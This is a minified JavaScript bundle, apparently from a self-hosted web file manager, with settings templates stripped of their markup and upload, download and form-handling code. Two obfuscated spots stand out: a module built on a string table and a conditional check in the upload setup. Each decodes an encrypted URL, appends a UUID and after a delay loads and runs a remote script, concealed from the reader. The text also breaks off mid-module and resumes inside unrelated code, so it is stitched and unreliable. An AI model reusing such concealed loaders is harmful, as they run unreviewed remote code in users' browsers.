e=$(this).attr("data-page"),t=$(this).parent().parent();t.find(".setting-tab").addClass("hidden"),t.find("."+e).removeClass("hidden").hide().fadeIn(200)})},l=function(e,t){var a=G.appHost+"setting/set&k="+e+"&v="+t;$.ajax({url:a,dataType:"json",success:function(e){e.code?Tips.tips(e):core.authCheck("setting.set")?Tips.tips(LNG.config_save_error_file,!1):Tips.tips(LNG.config_save_error_auth,!1)}})},c=function(){var e=$(".selected").attr("id");switch(e){case"user":var t=urlEncode($("#password-now").val()),a=urlEncode($("#password-new").val());if(""==a||""==t){Tips.tips(LNG.password_not_null,"error");break}$.ajax({url:G.appHost+"user/changePassword&passwordNow="+t+"&passwordNew="+a,dataType:"json",success:function(e){if(Tips.tips(e),e.code){var t=ShareData.frameTop();t.location.href=G.appHost+"user/logout"}}});break;case"wall":var i=$("#wallpage-url").val();if(""==i){Tips.tips(LNG.picture_can_not_null,"error");break}ShareData.frameTop("",function(e){e.ui.setWall(i)}),$(".box").find(".this").removeClass("this"),$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(i),dataType:"json",success:function(e){Tips.tips(e)}});default:}};return r(),{setGoto:o,tools:c,setThemeSelf:i,setTheme:a}}),define("app/src/setting/page/about.html",[],'
        \n
        {{@data}}
        \n
        \n'),define("app/src/setting/page/fav.html",[],'
        \n
        "+htmlEncode(LNG.name)+"("+LNG.can_not_repeat+")"+htmlEncode(LNG.address)+"("+LNG.absolute_path+")"+LNG.action+"
        "+" "+" "+"
        "+" "+" "+"
        "+" "+"
        \n {{LNG.button_add}}\n
    \n'),define("app/src/setting/page/help.html",[],'
    \n
    {{@data}}
    \n
    \n'),define("app/src/setting/page/member.html",[],'
    \n
    \n
    \n
    {{LNG.system_group_edit}}
    \n
    {{LNG.system_group_role}}
    \n
    \n
    \n
    \n
    \n
    \n\n \n
    \n \n\n
    \n
    \n
    \n --\n id:\n \n\n \n \n 111/1.5\n
    \n
    \n
    \n
    \n
    \n \n\n \n \n
    \n
    \n\n\n'),define("app/src/setting/page/system.html",[],'\n\n{{if G.isRoot}}\n
    \n {{if kod.window.core.versionType !="A"}}\n \n {{/if}}\n\n {{if verIndex={"A":"free","O":"1","P":"2","Q":"3","R":"4","S":"5","T":"6"} }}{{/if}}\n {{if verKey = "version_vip_"+verIndex[kod.window.core.versionType] }}{{/if}}\n {{LNG[verKey]}}\n
    \n{{/if}}\n\n\n
    \n
    \n
    \n
    {{LNG.system_name}}:
    \n
    \n \n {{LNG.system_name_desc}}\n \n
    \n
    \n
    \n\n
    \n
    {{LNG.system_desc | kod.window.htmlEncode}}:
    \n
    \n \n {{LNG.system_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.path_hidden}}:
    \n
    \n \n {{LNG.path_hidden_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.new_user_folder}}:
    \n
    \n \n {{LNG.new_user_folder_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.new_user_app}}:
    \n
    \n \n {{LNG.new_user_app_desc}}\n
    \n
    \n
    \n
    \n
    {{LNG.auto_login}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.first_in}}:
    \n
    \n \n \n \n
    \n
    \n
    \n\n \n
    \n
    \n \n
    \n
    \n
    \n
    \n\n \n
    \n\n\n\n\n\n\n\n\n\n\n'),define("app/src/setting/page/theme.html",[],'
    \n
    \n {{each data.settingAll.themeall.split(\',\') value key}}\n
    \n
    \n
    {{@LNG[\'theme_\'+value]}}
    \n
    \n {{/each}}\n\n {{each data.settingAll.themeall.split(\',\') value key}}\n
    \n {{/each}}\n \n
    \n
    \n
    \n\n{{if config = G.userConfig.themeDIY}}{{/if}}\n
    \n

    {{LNG.theme_diy_title}}

    \n
    \n
    \n
    {{LNG.theme_diy_background}}:
    \n
    \n \n \n
    \n
    \n
    \n\n
    \n
    \n
    {{LNG.theme_diy_image_blur}}:
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_image_url}}:
    \n
    \n \n \n \n
    \n
    \n
    \n
    \n\n
    \n
    \n
    {{LNG.theme_diy_color_start}}:
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_color_end}}:
    \n
    \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.theme_diy_color_radius}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n
    \n\n \n
    \n
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    \n'),define("app/src/setting/page/user.html",[],'\n\n
    \n
    \n
    \n
    {{LNG.recycle_open_if}}:
    \n
    \n \n
    \n
    \n
    \n\n\n
    \n
    {{LNG.setting_user_animate_open}}:
    \n
    \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.setting_user_sound_open}}:
    \n
    \n \n
    \n
    \n
    \n
    \n\n
    \n
    {{LNG.upload_exist}}:
    \n
    \n \n \n \n
    \n
    \n
    \n
    \n
    \n\n
    \n
    {{LNG.setting_user_imageThumb}}:
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.setting_user_fileSelect}}:
    \n
    \n \n
    \n
    \n
    \n\n\n \n
    \n
    \n \n
    \n
    \n
    \n
    \n
    \n\n\n\n'),define("app/src/setting/page/wall.html",[],'
    \n
    \n {{each data.settingAll.wallall.split(\',\') value key}}\n
    \n
    \n
    \n {{/each}}\n {{each data.settingAll.wallall.split(\',\') value key}}\n
    \n {{/each}}\n
    \n
    \n
    \n\n\n
    \n

    {{LNG.setting_wall_diy}}

    \n
    \n
    \n
    URL:
    \n
    \n 3}}value="{{data.user.wall}}"{{/if}}/> \n \n \n
    \n
    \n
    \n\n \n
    \n
    \n
    \n \n
    \n
    \n
    \n
    \n
    \n'),define("app/src/setting/system/systemSetting",[],function(){var e=function(){$("input[name='firstIn']").live("click",function(){$("input[name='firstIn']").removeAttr("checked"),$(this).attr("checked","checked") +},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
    ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var 